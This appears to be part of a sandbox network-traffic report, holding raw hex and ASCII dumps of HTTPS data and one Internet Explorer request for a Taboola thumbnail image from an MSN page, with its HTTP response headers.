                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC256INData Raw: dc 3c 46 dc 1d a8 7c 81 43 c0 17 c5 f5 60 53 88 61 01 ed 7a e7 53 97 3e 50 13 3f 0f 8c 80 1b 76 ef bd 22 a5 7d 44 fa 8b 89 a3 e1 4d 91 99 9b da 64 6a c7 11 31 7e fb 13 e1 47 cd dd 51 1c f3 cf 8e ae b8 4e 0c b0 25 3f c8 81 c8 36 59 06 bf c5 e2 8b ea 1f 50 0c af 18 04 02 40 73 e2 53 16 f3 d6 a5 b4 a4 50 7f 5b 7a 97 59 f5 a6 74 8f 27 73 fc 3d 6e a2 56 21 bb 4e 76 ed 91 41 a6 21 80 66 8c 00 ca 2b c7 57 92 f0 48 b9 07 2b 57 e7 d5 81 31 92 9d 3e 64 f5 78 c1 01 ee 36 ce d0 95 d4 bd 3b b5 5a 49 a3 b5 77 ae 55 c9 f6 92 c1 46 e2 29 4b 51 dc 4f f0 3a 66 4c d5 39 f1 38 24 90 6c d6 a5 2a 69 6b d0 40 26 49 05 3f c4 3b 5c ea d4 eb b3 7e d6 7a de 8d db 24 24 8b bc bd 13 b0 70 a2 da 4a f8 a5 51 b0 9f e2 fa b1 95 35 80 00 eb 7e 79 68 4e 5e b1 59 32 4f f2 71 4d 7a 5f 90 f4
                                                                                                                                                                                                                                  Data Ascii: <F|C`SazS>P?v"}DMdj1~GQN%?6YP@sSP[zYt's=nV!NvA!f+WH+W1>dx6;ZIwUF)KQO:fL98$l*ik@&I?;\~z$$pJQ5~yhN^Y2OqMz_
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC258INData Raw: 62 bf dc 32 f4 bd 7a 1d 5b 48 d1 06 44 82 17 86 37 d2 33 f2 4b 53 6d c4 60 23 99 80 a7 da 52 5b de d6 08 f1 d2 b8 4c b9 b3 07 f8 97 25 f2 6a 65 c9 f4 26 0b 2c b8 49 25 b0 0b ef 6a e5 51 a3 18 09 82 7c dd 4e 0c bd 33 32 76 6c 6d 3b 58 d4 46 36 e7 2c 76 ac 9b 62 7d de d3 b6 58 1d 19 39 23 60 1e 6a fa 92 4c b5 39 70 18 b5 af ca 24 b1 30 12 4a 05 da e1 ba 62 a5 59 fd a9 1d d9 96 72 45 ad 30 6b de 2c 5a d7 90 47 c7 f7 f0 7f 3f 3d 6b d0 84 94 e2 ad 0d 8b 10 6b 7f c6 96 06 3e 74 bf e2 7a 7b c6 a7 dc 27 ba 8f 6c f9 f1 c1 a1 cd 03 7b ef f8 1f f7 eb a4 24 03 41 e4 20 2c f4 d6 9e 74 8f 11 c8 85 00 66 be 4b 00 3c 85 27 fc d5 c7 3f c0 1f 83 d4 31 23 fe bc ec ed 5d 2f f9 ce 0b 2d 05 35 25 c8 61 4e 7a 5c 9e 47 ca 34 b5 3f d7 81 91 3b 8b bd 4e ed a7 6b 5e dd ac 18 37 0c
                                                                                                                                                                                                                                  Data Ascii: b2z[HD73KSm`#R[L%je&,I%jQ|N32vlm;XF6,vb}X9#`jL9p$0JbYrE0k,ZG?=kk>tz{'l{$A ,tfK<'?1#]/-5%aNz\G4?;Nk^7
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC259INData Raw: c8 b8 f9 78 b8 59 c8 ac 02 a1 6c 9c 6b 90 86 6f 87 96 30 58 f3 b8 13 60 75 a3 fa 64 e7 61 98 cb 4b 50 fa 3d 79 46 4f ea 92 4c b5 82 45 17 51 7f 8a 56 db e5 9c 24 b2 fd 35 8f ae 7a 4b 5a ed c6 b1 36 14 d8 f9 b8 c4 5b 04 6c b8 2a 48 d6 8b 04 4e fa 31 16 28 59 fe 2b 45 23 88 fb 5c 4a 43 d1 c3 dd 9b 4d eb 4d 8f 58 a5 9f c3 fd d9 2b fe 2e 90 4e b9 68 d9 b4 55 f9 71 de 09 0e 3e 40 29 24 6e e0 83 44 82 09 16 78 1e 6b 8a e2 a8 f5 ad 4a 82 e5 fd d0 41 14 d5 dc ed cf 38 c6 28 32 94 34 26 ff 00 d7 eb 78 d2 60 50 96 07 e7 82 07 04 7e 79 fc 9f ff 00 57 3d 49 a8 1f 31 6d 3b ac 02 65 4f 4f 93 04 be 96 f5 36 7f a6 75 3c 6d 4b 0e 66 5e cb 5c 90 ee 61 1c cb bb 98 dc 29 05 95 af c1 f9 03 f3 d2 9c 5f 08 8e 2a 59 4a 92 09 07 c2 a3 71 cf f4 62 c7 e9 dc 7a f8 45 83 88 e1 a6 20
                                                                                                                                                                                                                                  Data Ascii: xYlko0X`udaKP=yFOLEQV$5zKZ6[l*HN1(Y+E#\JCMMX+.NhUq>@)$nDxkJA8(24&x`P~yW=I1m;eOO6u<mKf^\a)_*YJqbzE
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC260INData Raw: f0 6a cf fa f5 10 9c 05 d2 c0 69 6e 9f 88 0a 91 42 c6 f9 0c 88 76 b3 9a 1a 53 e2 07 db 37 1e cb 97 85 d0 31 64 f7 59 de 69 45 6e 2c 0d 13 cd 52 df 90 4f 4d 20 a5 21 e8 48 05 ad 7f 7a 5a 13 5b 82 13 ad 28 e5 9d ad d3 db 68 1e d4 f3 96 31 f7 09 2b 09 11 59 4a 16 e1 d5 81 0f 4a 58 29 2a 79 6b 1c fc 72 3a 54 cb 5a e6 15 38 c2 f6 0f ea f4 7e eb 1e 99 34 21 21 37 65 1b 6f 9f 5e ef 0a 9f 54 6b b8 f0 56 44 9b fb 81 0e f0 80 b8 2a 02 83 fb bf 6d 8e 5b 9e 07 81 d3 09 4d dc 79 c2 e6 73 16 72 e7 93 16 b7 cf 3b 42 2f 5c f5 04 11 96 c9 9e 54 5d fd d7 8c 16 0c 4c 6c 7d bb 38 dc 49 14 0a 92 ab b8 78 27 8e 8a 11 76 a6 b9 0e f9 6d 6c 81 37 8a c0 e1 fd 79 0d f7 b8 b3 9e 69 3f 50 fa b1 51 64 98 cd db 11 29 31 ac ce 14 90 80 06 08 94 1a 8f 90 4f f9 98 8f 03 a9 e0 1c 8e 40 dc
                                                                                                                                                                                                                                  Data Ascii: jinBvS71dYiEn,ROM !HzZ[(h1+YJJX)*ykr:TZ8~4!!7eo^TkVD*m[Mysr;B/\T]Ll}8Ix'vml7yi?PQd)1O@
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC261INData Raw: 07 48 f4 fa cd 87 ea 18 3e dc a0 38 59 59 b1 db 80 08 82 68 a5 8e 48 c3 54 46 55 8d 0b 01 7d cd 84 ad f0 3a 02 89 3b 9c b2 1d fe b9 82 2a 52 52 1e ac 32 07 40 5f 2f 8d 22 6b 46 8f ef 73 31 a7 c6 7e ec ba 76 9e 99 62 10 08 71 d8 94 c4 ea 54 b1 0c 65 8a 88 51 4e 2e 8d f4 8f 10 95 cb 1f 79 4a 0c 4b e1 4b e2 6d 32 eb 76 e7 05 e1 4a 26 38 66 a5 c9 c8 03 d0 b6 be d9 16 e9 da 7c 09 a5 6b b8 46 28 87 72 29 25 d3 8b 82 64 86 09 9f ba c4 0f da 76 d5 12 4f f9 68 82 3a 81 52 d4 a4 ab 17 80 a5 34 73 6a bd ba d3 a6 55 61 4f 2b c2 06 22 5c bd 28 fc cd 4d ef f8 8c ba 26 44 4d a5 86 c8 54 0f 8b 9c 91 18 4a 98 f7 34 c8 3e e5 5c 51 e5 ab bc a5 28 fb a8 5d 9a 63 08 20 3b 12 06 45 d8 1f 6c 98 57 9c 0f 12 98 92 e3 5f 13 be 71 e7 41 86 3c 76 90 b6 52 e3 42 d9 59 98 59 6f 22 85
                                                                                                                                                                                                                                  Data Ascii: H>8YYhHTFU}:;*RR2@_/"kFs1~vbqTeQN.yJKKm2vJ&8f|kF(r)%dvOh:R4sjUaO+"\(M&DMTJ4>\Q(]c ;ElW_qA<vRBYYo"
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC263INData Raw: a4 57 2d 61 9e 1c 9f 48 e1 e1 21 51 95 24 4f 2b a9 27 66 4c 40 34 b1 b0 07 85 75 52 7e 78 e3 f8 eb 41 c3 14 cd 96 a2 a6 0a 48 ab 0b 30 c9 81 fc 5e 2b 78 92 ac 12 90 03 a9 c5 0f 31 6d 76 ae 5d 62 3b 4e 86 64 cc d6 44 91 b3 31 86 45 75 45 f7 a3 65 64 03 23 ee 36 3c 2f ed 3c 80 3f de 73 66 0f b4 94 8f e2 cc 14 cc fb eb 7c c8 19 d2 23 22 52 d3 31 65 69 29 07 52 0d f9 57 ad 75 ce 24 b5 98 ea 1d 23 07 12 26 68 4e 88 b2 b4 d3 1f d4 0d 0e e0 2d 4f 20 0d c0 7c 02 68 7e 4f 42 e1 c1 00 d5 ef 53 b8 0e 00 3b 79 33 e9 1c e2 13 8a 66 14 31 29 48 25 a9 42 f9 16 0f 9e c0 6f 5d cd 03 2f 23 fc 17 49 95 53 19 a4 d2 75 19 26 8e 59 45 39 8c 4e 92 80 de 0b 7f f1 50 a9 e3 6b 7c 78 eb 93 88 72 2e 4b 7e fa c4 e5 05 30 a1 bd e9 46 6e 7b fe 21 a9 a0 05 c8 97 50 0a 68 43 a8 b3 42 95
                                                                                                                                                                                                                                  Data Ascii: W-aH!Q$O+'fL@4uR~xAH0^+x1mv]b;NdD1EuEed#6</<?sf|#"R1ei)RWu$#&hN-O |h~OBS;y3f1)H%Bo]/#ISu&YE9NPk|xr.K~0Fn{!PhCB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC264INData Raw: f6 44 96 0a 17 b1 f9 ea c2 49 13 10 54 92 e0 12 09 d3 be c4 55 2f c2 bc 27 f9 50 e1 7b 81 7b 53 4d 7c a3 36 a1 8b 10 4c 6c b8 21 48 9a 78 d5 e1 b9 84 52 44 8c cb 18 02 14 b6 92 40 a7 bd 6a c3 cf 9b e8 b3 50 c8 70 f4 21 ce 5a 69 bd 9e 09 2b 89 21 45 29 4b 96 ae 79 e6 f0 1f a8 49 26 9f 91 36 46 56 6c 82 29 41 88 45 24 3b fb 84 db ef 94 d1 db 23 ca e8 69 9b 75 11 7c 0a 09 4c 41 4a 7e e1 a2 4e 67 ca 91 63 28 12 02 b0 b1 37 02 c7 97 2a 36 4e 09 71 1a cf 01 61 b9 d9 a6 11 87 65 8a 01 6c 17 8a 50 0d 07 7d c4 82 3c ed 07 f8 3d 0d 68 96 10 16 48 73 cd ed 95 3b ce 22 56 a0 40 52 70 8a b1 36 cd e8 3d 45 83 e9 48 c5 95 9f 14 8d 0e 36 1e c8 25 45 8c 39 26 40 1d 80 ad f2 c6 c3 74 7b 14 31 0b 5c 1b ae 96 e9 ab 33 5f 3f 3b 74 a9 89 4a 4a d9 d8 e1 7b e8 1a c0 d4 8f 9b 44
                                                                                                                                                                                                                                  Data Ascii: DITU/'P{{SM|6Ll!HxRD@jPp!Zi+!E)KyI&6FVl)AE$;#iu|LAJ~Ngc(7*6NqaelP}<=hHs;"V@Rp6=EH6%E9&@t{1\3_?;tJJ{D
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC265INData Raw: ff 00 e2 df 22 0d f5 39 aa 32 90 c9 fe 2c 09 d2 94 cf fa e8 c4 6b e9 f6 4a 45 0e 16 54 f1 2a c3 0e af 88 98 f0 b5 ba ed 8b 6a 13 ba ad 9b 70 f6 dd ed 5b 02 87 4c f1 88 50 62 8d 06 2e 7f a7 35 e4 6f 58 5b 85 29 52 55 8d 55 3e 24 8b d2 fa 1e ea f9 41 47 ab 4e 53 fa 6b d1 71 63 c1 17 7e 6d 67 54 c3 0c a8 42 9c 79 f2 02 15 3e 01 23 1e 5d e5 96 b6 96 6f f3 58 e9 6e 10 11 3a 7b ff 00 1c 20 83 ff 00 ea 73 d1 fa c1 66 cb 69 43 25 02 69 cc f8 73 66 6c b3 d9 9e 35 e3 cf fb 74 d4 a4 84 09 20 ef 69 b8 0d 09 66 74 8e 57 12 a9 86 16 a2 44 91 2b c4 6d 48 b6 34 de 2c 1c e1 38 19 a8 0e 23 5a 17 14 cf 2d 8b 42 e8 2a 40 21 9c 65 6a 6b 98 8f 3e 98 d5 a5 cf d4 35 76 63 23 2e 5e 14 ab 0a 30 24 bb 3c 6d 8d 34 4e ed ee e0 c0 ae 2c d0 04 2f 34 4f 5e 99 60 3f c3 22 35 eb 9f c3 93
                                                                                                                                                                                                                                  Data Ascii: "92,kJET*jp[LPb.5oX[)RUU>$AGNSkqc~mgTBy>#]oXn:{ sfiC%isfl5t iftWD+mH4,8#Z-B*@!ejk>5vc#.^0$<m4N,/4O^`?"5


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  7192.168.2.749778151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC31OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC70INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 15509
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  edge-cache-tag: 559838787932382582557766922736754224237,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                  etag: "bf391688f908c659d6e40b810aae418c"
                                                                                                                                                                                                                                  last-modified: Tue, 24 Aug 2021 14:16:06 GMT
                                                                                                                                                                                                                                  status: 200 OK
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                  x-ratelimit-remaining: 100
                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                  x-request-id: 158e7bea3af9b54d4bd7c00dace666b6
                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 290
                                                                                                                                                                                                                                  X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:43 GMT
                                                                                                                                                                                                                                  Age: 811515
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5568-WDC, cache-dca17750-DCA, cache-hhn4072-HHN
                                                                                                                                                                                                                                  X-Cache: MISS, HIT, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 0, 1, 1
                                                                                                                                                                                                                                  X-Timer: S1631265103.382296,VS0,VE1
                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg
                                                                                                                                                                                                                                  X-vcl-time-ms: 1
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC71INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 04 05 02 03 06 07 01 00 08 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e7 64 2a 2a ee 5a db 02 c4 22 39 61 8e e1
                                                                                                                                                                                                                                  Data Ascii: JFIF+""+2*(*2<66<LHLdd+""+2*(*2<66<LHLdd7"4d**Z"9a
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC72INData Raw: 74 fe 6d db 9a 59 95 7b 7d 28 da 03 38 c6 b6 ff 00 7d cd d1 0b 3e fa 6a fa fe fa 47 e8 ce cb f7 dc 5a 3e aa fb e4 cb 37 ef a4 be f7 ef a0 56 37 df 36 15 df 7c 9b 0c 77 df 35 f9 fb 9a 7d f7 67 03 4f 3e fa da 52 cb ef a2 bf ff c4 00 2b 10 00 03 00 01 04 02 03 00 02 02 02 03 01 01 00 00 01 02 03 04 00 05 11 12 06 13 14 21 22 07 31 15 23 24 32 16 33 41 25 34 ff da 00 08 01 01 00 01 09 00 0c be f2 a2 8c f0 a7 2d 90 9f 10 f2 8e d5 f4 86 c6 08 69 92 3d b3 70 07 21 0d a8 15 9a ad 1c 70 5a 2e d2 2c d7 08 b6 34 67 cc 5c 36 4b 61 5a 35 86 22 4c 3b c6 6b ec f6 55 81 d5 ec 25 8e aa 55 47 06 5d 4f 03 b0 03 59 3f 78 d3 50 64 45 2b 17 47 a5 1a 88 54 1b 2d 4c b2 03 4d d0 27 ed ca 14 ee 02 9d d9 57 9d c5 f8 db 39 19 1d 98 39 2d 8f 33 a7 98 2e c0 6a 93 74 dd 2a 54 4d df 1f
                                                                                                                                                                                                                                  Data Ascii: tmY{}(8}>jGZ>7V76|w5}gO>R+!"1#$23A%4-i=p!pZ.,4g\6KaZ5"L;kU%UG]OY?xPdE+GT-LM'W99-3.jt*TM
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC74INData Raw: c1 43 1e d7 ab 3e a6 aa 21 72 34 0f 49 5b 95 c8 21 72 a9 c6 bf a8 cb b3 35 18 73 aa 14 a1 92 b2 ee 15 a7 ae 95 45 78 94 ca 4e 35 94 03 10 ae 72 66 7e 55 98 99 1e f8 4e eb ac 8c b5 ff 00 6d 55 3c bb 20 cd 70 71 26 de 1f b0 e3 9c 48 e6 30 d9 f1 a3 38 74 0a 24 8b 2a a8 17 94 00 ea 5b 7c c5 95 95 d5 93 cb 76 96 c4 5c 31 1a 6d 19 a9 97 b3 e1 a1 20 33 c6 8a e3 0d 50 1e a5 9e 6c 72 72 b9 2e 79 e0 83 b8 11 f3 33 64 eb 4a 01 7c 86 61 20 44 f3 00 d2 b2 0c 4d c1 ba e5 29 36 ba 8d 31 2a 91 08 39 0b eb e0 e3 af 0f 10 da cd 76 26 1f 71 56 ae 47 62 f6 1c 3c 98 eb 24 b7 2d db 54 b7 ab 68 77 e2 bf fa e4 81 3c 8d 2d 97 bf 3e 3c 97 6c dc 76 bd 83 6e c3 4d c3 23 6a fe 4b f0 20 c2 19 7b 8e 35 b0 37 2c 19 65 60 67 ef db ff 00 8d f8 e5 12 7b a6 7e e3 fc 85 b0 64 64 b4 f0 70 37
                                                                                                                                                                                                                                  Data Ascii: C>!r4I[!r5sExN5rf~UNmU< pq&H08t$*[|v\1m 3Plrr.y3dJ|a DM)61*9v&qVGb<$-Thw<-><lvnM#jK {57,e`g{~ddp7
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC75INData Raw: 59 62 6d f2 dd bc 76 7e 33 9e b1 db 9f 73 9b 6f be 38 25 39 ee d8 f2 f8 30 cf 5a 09 e4 a2 0c a5 96 52 ad 72 20 80 f0 c0 b3 9d 64 09 ad b7 91 ce dc fc d1 0f 3b 5f ac 43 32 ac 76 f7 56 b0 72 28 e0 e3 53 ae be cd 63 aa 71 4c 6c aa aa e0 54 3c 6d 43 a2 02 2b 82 60 4b 61 c0 0d 75 b6 41 a2 46 47 69 dc 46 1d 27 45 c5 da eb 4d eb 16 76 d3 bb be dc 80 eb 28 fc c4 84 9c 7c 65 c6 5d d7 29 e9 bf 78 a4 7c 5f d5 b9 e0 a6 46 e3 3c 15 95 b2 2d b1 6c 1b cf 92 4e 59 39 29 81 81 81 b4 63 2e 2e df 8f e5 f8 b3 ae cd f3 4b 66 62 64 61 e7 7c 89 30 c2 c4 c6 86 44 ad 8f 1c 86 8e 0d 20 da ca d9 e7 0c cc b4 49 cc 53 d3 4c 76 1b 85 39 dc f7 a3 ce db ff 00 bd 3a 6b 11 80 da 72 49 38 84 ff 00 90 28 0c d4 5a 74 5e c8 8a b4 8b 06 15 32 db 32 ba 9d b8 3d 31 f1 5b d7 43 46 9d 0f 69 43 be
                                                                                                                                                                                                                                  Data Ascii: Ybmv~3so8%90ZRr d;_C2vVr(ScqLlT<mC+`KauAFGiF'EMv(|e])x|_F<-lNY9)c..Kfbda|0D ISLv9:krI8(Zt^22=1[CFiC
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC76INData Raw: c7 f6 26 26 4b 2e 73 7a a1 92 c3 59 8c 57 e1 a8 4d 9d 3f fd ac 65 61 ef 66 29 d9 dd 66 ea 85 35 8c 4b c9 64 56 f7 2b b4 65 fe 31 ab f0 36 3c 42 53 c6 b6 f3 8d 1f de a3 04 45 89 e7 a9 00 70 bb a9 49 62 d5 98 6c a3 d1 b2 6d 58 ea 31 87 b6 f6 b1 3c 81 a3 fd f1 aa 28 e7 b1 d2 00 a9 a3 fd 93 a0 bf 5c 6b 70 88 a6 35 c7 38 bc 2a 4c 32 85 7a ce 85 84 09 45 50 cb bb 45 9c b9 64 de 30 db 14 7b 49 ce 89 be d0 2d c6 43 ab 26 dc 18 60 3a cf 70 c3 b9 d1 7e 33 a6 34 a7 92 ae 49 3d 21 90 39 bd 1d 31 1d 4b 6d f8 f2 c8 dc 36 7c 76 d6 ce a2 71 9b e9 fa 9a 12 34 cc 38 3f 8d c5 69 79 cf 10 13 44 86 3b 99 0c 69 89 20 40 49 e5 b4 bf fd d5 07 2b c6 99 ba ab 1d 20 e6 7c eb b7 f5 ac af d4 dc 72 64 53 2e f3 23 1b b9 93 28 2f 15 86 7c 1a 8f 47 39 4a d6 ab 6f 68 b6 da f2 54 2b c8 26
                                                                                                                                                                                                                                  Data Ascii: &&K.szYWM?eaf)f5KdV+e16<BSEpIblmX1<(\kp58*L2zEPEd0{I-C&`:p~34I=!91Km6|vq48?iyD;i @I+ |rdS.#(/|G9JohT+&
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC78INData Raw: 0b 7a 37 fe d5 5c 51 d0 6f ad c0 58 da c2 91 b2 4a 3f 71 a0 34 71 bd a9 41 6b c8 39 14 39 41 11 99 58 67 86 3d c1 c6 83 9a 45 fb f2 14 4f 12 31 af 45 f1 86 86 fd 58 ee ef 4e a1 61 4f 26 88 1e 7b d2 a6 78 92 57 11 74 68 0b f0 05 2e 51 e9 0d dc 69 78 2a f6 56 8f 1f 64 79 40 2c 04 da e1 0d 75 d8 a0 4f 90 a5 79 fa 5a 2c 69 1d 50 5f 88 48 5b 09 0d e0 d0 25 5e ff 00 65 d6 4d d9 0e 01 f0 72 ea d1 e9 5e ca 2c 24 96 4b db 40 32 f7 05 45 03 63 d8 74 dd 3f 34 8b 00 aa 01 4a c6 bd c1 85 c3 53 45 d7 9a 2b 11 84 16 e7 c6 3d fe 53 d8 e6 ec 41 16 88 4d 3c 2e bf 9c 8f 01 61 b0 67 11 b9 34 d4 fc 1c 50 96 91 ce a1 da d4 6a cf 7d 29 b1 1f 4d cc 0c e2 dd a8 7b 1a 53 63 75 6d 10 af 72 98 f7 32 46 be cd 83 65 7e 91 64 7c ac 44 6d 7b 1a d7 36 f4 f1 f0 54 f8 67 44 cd 4d dd a9 bb
                                                                                                                                                                                                                                  Data Ascii: z7\QoXJ?q4qAk99AXg=EO1EXNaO&{xWth.Qix*Vdy@,uOyZ,iP_H[%^eMr^,$K@2Ect?4JSE+=SAM<.ag4Pj})M{Scumr2Fe~d|Dm{6TgDM
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC79INData Raw: 62 72 e1 d1 73 a2 b2 24 34 92 93 f1 ff da 00 08 01 01 00 0a 3f 00 5c 06 24 60 ed da ad 41 51 6c 36 cd c8 98 63 03 79 a7 d6 b6 64 98 20 10 0c 4f 6a d6 1a 35 09 88 99 5a 8f 4c 38 51 d5 73 06 81 75 f0 60 11 d3 de 2a 59 92 4c e2 75 66 68 5b 05 b9 4e a1 24 f9 e9 14 6d 5a 63 08 b1 0d f5 eb 34 84 17 0b a4 a8 23 97 20 4d 05 41 21 91 40 03 ae 23 6a b7 d6 09 50 b4 0b 4e 9d 3b 92 24 09 a9 2a 8b 42 00 db 73 58 b7 ad 8c 98 19 a3 1a 03 29 8f 3b 82 69 48 67 0a 4e 04 08 c9 33 51 a1 d0 02 44 12 7a c7 7d a8 e9 f4 f6 98 02 97 e3 00 6a 24 6f fb 66 b6 ba c3 b6 98 ea 62 b1 fc c3 99 20 fe 55 90 05 12 4a 3f 69 c5 0f 88 1e b4 75 00 20 0e f9 9a 00 0d 65 9b 1b 69 ef da 90 49 18 1b 34 a8 fb f7 14 ba 12 d1 56 1b 01 10 24 67 69 de 9d b9 2c 04 89 95 8f 95 29 66 04 90 77 32 66 6b 01 46
                                                                                                                                                                                                                                  Data Ascii: brs$4?\$`AQl6cyd Oj5ZL8Qsu`*YLufh[N$mZc4# MA!@#jPN;$*BsX);iHgN3QDz}j$ofb UJ?iu eiI4V$gi,)fw2fkF
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC81INData Raw: 4d dd 04 0e 90 36 af 8b 53 c0 ff 00 71 db 3e 05 03 a8 40 20 ed 1d 6b 1a c6 00 fd 28 80 88 54 0d e7 7d c4 50 22 58 22 ff 00 c7 fe eb 05 51 9f cc 92 49 35 c3 5a 3a 9b 90 de 5f cb cb 15 6e ec d8 13 a0 ea e6 3c b9 8d a0 0a e7 7b 50 41 f3 de a4 92 4b 4e d2 73 f4 a5 63 a1 8e 7a 91 49 12 07 5f ee 8a 58 d3 18 81 d0 50 c1 38 38 8f 95 46 36 3d 35 2f 99 a3 3f cc 38 3e 21 cd 7c 0a 73 f3 04 d7 c2 47 be 45 6e ea a7 eb 5f ea 13 81 dc 51 6d 48 04 82 39 45 69 04 29 f7 ee 62 a0 16 88 dc 83 d2 62 a1 bd 42 02 ac b0 90 30 68 0f 56 cc 80 c3 30 49 93 4d cf a4 c0 90 76 1b d2 cf a6 48 1b 7e 62 3e 43 6a e6 38 c7 50 2b 4e 93 6f 6c cf 30 03 1d 62 68 32 00 61 d4 8d d8 f3 36 73 22 99 84 96 b7 6d 16 5e e1 89 89 f7 c9 a1 66 d9 b7 85 b7 b4 f9 ea 68 03 cd 33 90 65 87 e8 69 a5 b8 2b 8c 20
                                                                                                                                                                                                                                  Data Ascii: M6Sq>@ k(T}P"X"QI5Z:_n<{PAKNsczI_XP88F6=5/?8>!|sGEn_QmH9Ei)bbB0hV0IMvH~b>Cj8P+Nol0bh2a6s"m^fh3ei+
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC82INData Raw: 4f a8 80 85 de 60 f5 a0 01 ba f3 07 10 0d 11 a1 74 c1 11 21 54 8c 4c c9 31 45 65 b3 e0 c0 81 14 48 6b 96 c4 09 d8 0d 85 19 20 6d b8 9d aa 44 ce f0 73 8a 63 f1 6d d3 48 9a 7f 47 81 8b 77 1f 32 a5 df 54 19 e9 1b 50 56 84 3a 76 c3 a8 71 8f 21 84 51 16 d4 12 d9 fc ab 4b 76 d0 e1 cd de 22 17 9d ae b9 1a 4a ea 95 2b d0 83 56 95 c0 ba a0 d9 46 01 54 95 2a b7 0c e6 3f 34 01 44 cd a6 30 4f 48 d8 c5 63 41 1b 75 22 00 f9 c9 ab 26 d2 19 b3 a4 73 a0 78 0d af cb 1c d1 87 42 d1 db 68 f7 15 b0 53 ff 00 b4 9c 4d 28 32 1a 48 9d e8 48 27 7f 18 8f bd 19 4e 22 e4 fb 93 44 b0 b8 48 8f 28 0c 51 93 70 31 14 60 5e 63 b5 48 2e c7 cd 0c e8 df a6 66 80 80 a5 97 79 26 d1 8f fe 54 40 b7 c4 12 5b ff 00 50 4e 23 c8 a6 66 46 65 92 73 01 8f da 0d 72 97 62 40 33 00 75 a3 a8 a8 32 0e d4 00
                                                                                                                                                                                                                                  Data Ascii: O`t!TL1EeHk mDscmHGw2TPV:vq!QKv"J+VFT*?4D0OHcAu"&sxBhSM(2HH'N"DH(Qp1`^cH.fy&T@[PN#fFesrb@3u2
